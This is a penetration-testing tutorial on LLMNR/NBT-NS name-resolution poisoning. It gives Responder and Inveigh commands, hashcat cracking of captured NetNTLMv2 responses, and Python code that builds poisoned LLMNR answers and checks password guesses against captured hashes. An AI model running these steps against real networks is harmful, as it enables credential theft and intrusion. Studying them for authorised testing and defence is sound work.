Getting a Foothold
LLMNR/NBT-NS
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows name-resolution fallbacks: when a DNS lookup fails, the host multicasts (LLMNR, UDP 5355) or broadcasts (NBT-NS, UDP 137) the name it is looking for to the local segment and accepts the first answer it receives. Neither protocol authenticates the responder, so any host on the network can reply and claim to be the requested name.
This is where Responder comes in. By answering those requests with our own IP address we poison the client's name resolution, so when it connects to what it believes is the real server (an SMB share, for example) it authenticates to us instead. This man-in-the-middle position lets us capture the NetNTLM challenge/response from the authentication that follows (on modern hosts usually an NTLMv2-SSP response), which can then be cracked offline.
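To make concrete what "any host on the network can reply" means, here is an added Python example (not part of the original page, and not Responder's code). It builds an LLMNR query in the DNS wire format LLMNR reuses, crafts the poisoned answer a rogue host would send back, and shows the only checks a resolver performs before trusting an answer: the transaction ID and the question name must match. The name, IP addresses and transaction ID are constructed sample values, and nothing is sent on the network.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"  # IPv4 multicast group LLMNR queries are sent to
LLMNR_PORT = 5355


def _encode_name(name: str) -> bytes:
    # DNS-style label encoding: <len><label>... terminated by a zero byte
    out = b"".join(struct.pack("B", len(l)) + l.encode() for l in name.split("."))
    return out + b"\x00"


def _decode_name(buf: bytes, off: int):
    labels = []
    while True:
        ln = buf[off]
        off += 1
        if ln == 0:
            return ".".join(labels), off
        labels.append(buf[off:off + ln].decode())
        off += ln


def build_query(txid: int, name: str) -> bytes:
    # LLMNR reuses the DNS message format: 12-byte header + one question (type A, class IN)
    hdr = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return hdr + _encode_name(name) + struct.pack(">HH", 1, 1)


def parse_query(pkt: bytes):
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1:
        return None  # a response, or not a simple single-question query
    name, off = _decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    # What a poisoner answers: same txid and question, QR=1, one A record pointing at us
    q = parse_query(query)
    hdr = struct.pack(">HHHHHH", q["txid"], 0x8000, 1, 1, 0, 0)
    question = _encode_name(q["name"]) + struct.pack(">HH", q["qtype"], q["qclass"])
    # answer: compression pointer to the name at offset 12, type A, class IN, TTL, RDLENGTH=4, RDATA=IP
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return hdr + question + answer


def parse_response(pkt: bytes):
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    name, off = _decode_name(pkt, 12)
    off += 4  # skip qtype/qclass of the echoed question
    if (pkt[off] & 0xC0) == 0xC0:
        off += 2  # compression pointer back to the question name
    else:
        _, off = _decode_name(pkt, off)
    rtype, rclass, rttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    return {"txid": txid, "name": name, "ip": socket.inet_ntoa(pkt[off:off + rdlen])}


def client_accepts(query: bytes, response: bytes) -> bool:
    # A resolver only checks that the transaction ID and name match its outstanding
    # query. There is no authentication of the answering host, so the first reply wins.
    q, r = parse_query(query), parse_response(response)
    return q is not None and q["txid"] == r["txid"] and q["name"].lower() == r["name"].lower()


if __name__ == "__main__":
    # constructed sample: a client mistypes a share name and falls back to LLMNR
    query = build_query(0x1234, "fileshrae")
    poisoned = build_poisoned_response(query, "10.10.14.5")  # constructed attacker IP
    print(parse_response(poisoned), client_accepts(query, poisoned))
```

The 16-bit transaction ID is the only thing a poisoner has to match, and it is carried in the multicast query every host on the segment receives, which is why Responder can answer every request it sees.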
Using Responder in Linux
Responder is extremely powerful and has many options. Some of the most useful:
-A
Analyze mode: log NBT-NS, BROWSER and LLMNR requests without poisoning them (a quiet way to confirm there is traffic to poison before going loud)
-w
Start the WPAD rogue proxy server
-f
Attempt to fingerprint the remote host's OS and version
-v
Increase verbosity
-F
Force NTLM or Basic authentication on wpad.dat retrieval
-P
Force NTLM (transparent) or Basic (prompt) authentication for the proxy
Poisoning authentication challenges using Responder
sudo responder -I tun0 -dwP
-I selects the interface to listen on; -w starts the WPAD rogue proxy and -P forces clients that use it to authenticate (check responder -h for what -d enables in the installed version). Once started, leave Responder running for a while to maximize the number of hashes captured. In this case we received an SMBv2 connection and Responder extracted an NTLMv2-SSP response. Captured hashes are written to Responder's logs directory (/usr/share/responder/logs on Kali), one file per protocol and client IP, in a format hashcat can read directly.

Cracking an NTLMv2 Hash with Hashcat
hashcat -m 5600 hash.txt password-list.txt --force
Mode 5600 is NetNTLMv2 (use 5500 for NetNTLMv1 responses). --force only suppresses hashcat's warnings, such as a missing or unsupported OpenCL runtime; leave it out on a properly set-up system. What we crack is a challenge/response, not the NT hash itself, so a successful crack yields the account's cleartext password, which we can then use to enumerate the domain further.
At this stage it is best to crack as many hashes as possible: every additional account gives us more leverage later on.
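Both points above (what Responder actually captured, and why it pays to collect many hashes before cracking) are easier to reason about once the response is computed by hand. The following Python is an added example, not the page's or Responder's code: it reimplements the NetNTLMv2 computation that hashcat mode 5600 brute-forces (NT hash = MD4 of the UTF-16LE password; NTLMv2 key = HMAC-MD5 over the uppercased user name plus the domain; NTProofStr = HMAC-MD5 over the server challenge plus the client blob), parses hash lines in the USER::DOMAIN:challenge:NTProofStr:blob format Responder logs, and de-duplicates them per account so a first cracking pass is not spent on repeated captures of the same user. The user names, domain, passwords, challenges and blob are constructed sample values, and MD4 is implemented inline because hashlib.new("md4") is unavailable on many OpenSSL 3 systems.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    # Pure-Python MD4 (RFC 1320), used because OpenSSL 3 builds often refuse hashlib.new("md4")
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = [  # (boolean function, word order, shift cycle, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    ]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = h[:]
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = (-i) % 4  # rotate which of A,B,C,D is updated each step
                b, c, d = (a + 1) % 4, (a + 2) % 4, (a + 3) % 4
                r[a] = _lrot((r[a] + fn(r[b], r[c], r[d]) + X[idx] + k) & MASK, shifts[i % 4])
        h = [(x + y) & MASK for x, y in zip(h, r)]
    return struct.pack("<4I", *h)


def ntlm_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def netntlmv2_response(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    # NTLMv2 key = HMAC-MD5(NT hash, UPPER(user) + domain as UTF-16LE); the domain keeps its case
    key = hmac.new(ntlm_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    # NTProofStr = HMAC-MD5(key, server challenge || client blob) -- this is what hashcat recomputes per guess
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_5600(line: str) -> dict:
    # hashcat -m 5600 format, as Responder logs it: USER::DOMAIN:challenge:NTProofStr:blob
    user, _, domain, chal, proof, blob = line.strip().split(":", 5)
    return {"user": user, "domain": domain, "challenge": chal, "proof": proof, "blob": blob}


def check_password(line: str, password: str) -> bool:
    h = parse_5600(line)
    got = netntlmv2_response(password, h["user"], h["domain"],
                             bytes.fromhex(h["challenge"]), bytes.fromhex(h["blob"]))
    return hmac.compare_digest(got.hex(), h["proof"].lower())


def unique_per_user(lines) -> dict:
    # Each capture of the same account carries a fresh challenge and blob, but cracking
    # any one of them recovers the password: keep the first line per DOMAIN\user.
    seen = {}
    for line in lines:
        if line.count(":") < 5:
            continue  # blank or malformed line
        h = parse_5600(line)
        seen.setdefault(f"{h['domain']}\\{h['user']}", line.strip())
    return seen


def forge_line(user, domain, password, challenge_hex, blob_hex) -> str:
    # Constructed sample only: builds a 5600 line from a known password so the example
    # runs offline. Real lines come from Responder's log files.
    proof = netntlmv2_response(password, user, domain, bytes.fromhex(challenge_hex), bytes.fromhex(blob_hex))
    return f"{user}::{domain}:{challenge_hex}:{proof.hex()}:{blob_hex}"


# constructed NTLMv2 client blob: header, timestamp, client challenge, reserved, one AV pair, terminator
SAMPLE_BLOB = ("0101000000000000" + "00d0d3c34e4bd901" + "0102030405060708" + "00000000"
               + "02000800" + "43004f0052005000" + "00000000" + "00000000")

# constructed captures: the same user seen twice (two challenges) plus a second account
SAMPLE_LINES = [
    forge_line("jdoe", "CORP", "Password1", "1122334455667788", SAMPLE_BLOB),
    forge_line("jdoe", "CORP", "Password1", "8877665544332211", SAMPLE_BLOB),
    forge_line("svc_backup", "CORP", "Summer2023!", "a1b2c3d4e5f60718", SAMPLE_BLOB),
]

if __name__ == "__main__":
    for key, line in unique_per_user(SAMPLE_LINES).items():
        print(key, check_password(line, "Password1"))
```

The per-account de-duplication is for the first cracking pass only: keep the full log, since every line for an account is independently crackable with the same wordlist, and responses captured later may come from protocols (WPAD, HTTP) that other accounts use.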
Using Inveigh in Windows
Inveigh is the Windows counterpart to Responder. It was originally written in PowerShell and is now maintained in C#; it can listen on IPv4 and IPv6 and handles LLMNR, NBNS, mDNS, DNS, LDAP and other protocols.
Using Inveigh in Powershell
Import-Module .\Inveigh.ps1
(Get-Command Invoke-Inveigh).Parameters
Starting Inveigh
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Once started we should immediately see LLMNR and mDNS requests coming in, and any captured hashes are written to disk because of -FileOutput Y.
Using Inveigh in C#
The PowerShell version is no longer updated, but the C# version is.
.\Inveigh.exe
Once running, the startup banner lists every listener and option: those prefixed with [+] are enabled by default, and those prefixed with [ ] are disabled.
Pressing ESC enters an interactive console where we can enter commands.
Useful commands
HELP
- Show a help screen with the commands we can type
GET NTLMV2UNIQUE
- Show unique captured NTLMv2 hashes
GET NTLMV2USERNAMES
- Show the collected usernames